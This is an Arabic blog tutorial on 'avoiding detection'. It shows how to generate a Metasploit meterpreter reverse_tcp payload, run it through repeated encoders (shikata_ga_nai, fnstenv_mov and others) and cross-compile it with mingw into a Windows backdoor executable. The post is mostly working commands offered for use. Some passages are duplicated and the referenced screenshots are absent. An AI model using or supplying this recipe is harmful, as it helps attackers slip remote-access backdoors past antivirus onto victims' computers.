طريقة تشفير البايلود باستخدام تقنية القوالب | Avoiding detection
كيف حالكم أعضاء وزوار مدونتنا الكرام، ان شاء الله تكونو بألف خير،
درس اليوم هو حول كيفية تشفير بايلود باستخدام قوالب أو templates، الطريقة خفيفة، مفيدة وسهلة على المبتدئين،
المتطلبات:لكي يعمل الباكدور على بيئة windows، سنحتاج إلى هذا المترجم، gcc-mingw32
لتثبيثه، قم بإدخال هذا الأمر:
القالب المستخدم موجود بهذا المسار:
لمن لم يجده، تستطيع تحميله من هنا:
http://www.gulfup.com/?6EKV2F
سنبدأ أولا بإنتاج شيل كود (sh3ll code) مشفر عن طريق الـ Encoders، تابعوا الصورة:
المتطلبات:لكي يعمل الباكدور على بيئة windows، سنحتاج إلى هذا المترجم، gcc-mingw32
لتثبيثه، قم بإدخال هذا الأمر:
كود:
sudo apt-get install gcc-mingw32
القالب المستخدم موجود بهذا المسار:
كود:
/opt/m e tasploit/apps/pro/msf3/data/templates/src/pe/exe
لمن لم يجده، تستطيع تحميله من هنا:
سنبدأ أولا بإنتاج شيل كود (sh3ll code) مشفر عن طريق الـ Encoders، تابعوا الصورة:
كود:
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8443 R | msfencode -e x86/fnstenv_mov -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 3 > sh3llcode.c
windows/meterpreter/reverse_tcp : هو البايلود المستخدم127.0.0.1 : الآيبي المحلي
8443 : البورت المحليR هي صيغة البايلود الناتج raw وتعني خام، سنحتاج أن يكون البايلود بهذه الصيغة حتى يتسنى لنا تشفيره بالـ msfencoders،
x86/fnstenv_mov و x86/shikata_ga_nai هما الـ encoders الذي استخدمت في تشفير البايلود، لاستعراض باقي الـ encoders أدخل هذا الأمر:
كود:
show encoders
العدد 3 هو لعدد مرات التشفير، يقوم بتكرار التشفير 3 مرات، يمكنك تغييره حسب رغبتك،
أخيرا sh3llcode.c هو اسم الملف الناتج، الذي سيحتوي على شيل كود البايلود،
هذا الملف الناتج،
أخيرا sh3llcode.c هو اسم الملف الناتج، الذي سيحتوي على شيل كود البايلود،
هذا الملف الناتج،
وهذا محتواه،
متغير comment لم أضع فيه أي شيء، يمكنكم أن تضعوا فيه ما تشاؤون،
بعد ذلك نقوم بحفظ الملف ثم ترجمته عن طريق الأمر:
بعد ذلك نقوم بحفظ الملف ثم ترجمته عن طريق الأمر:
كود:
i586-mingw32msvc-gcc -o Marco.sbou.exe template.c
بحيث أن Marco.sbou.exe هو اسم الباكدور الناتج، و template.c هو اسم القالب،
نتيجة الـ compiling
نتيجة الفحص،
هذا أفضل ما استطعت التوصل إليه لحد الآن، يمكنكم استخدام أكثر من encoder في نفس الوقت مثلا:
كود:
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8443 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/jmp_call_additive -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 3 > sh3llcd.c
-->







ليست هناك تعليقات:
إرسال تعليق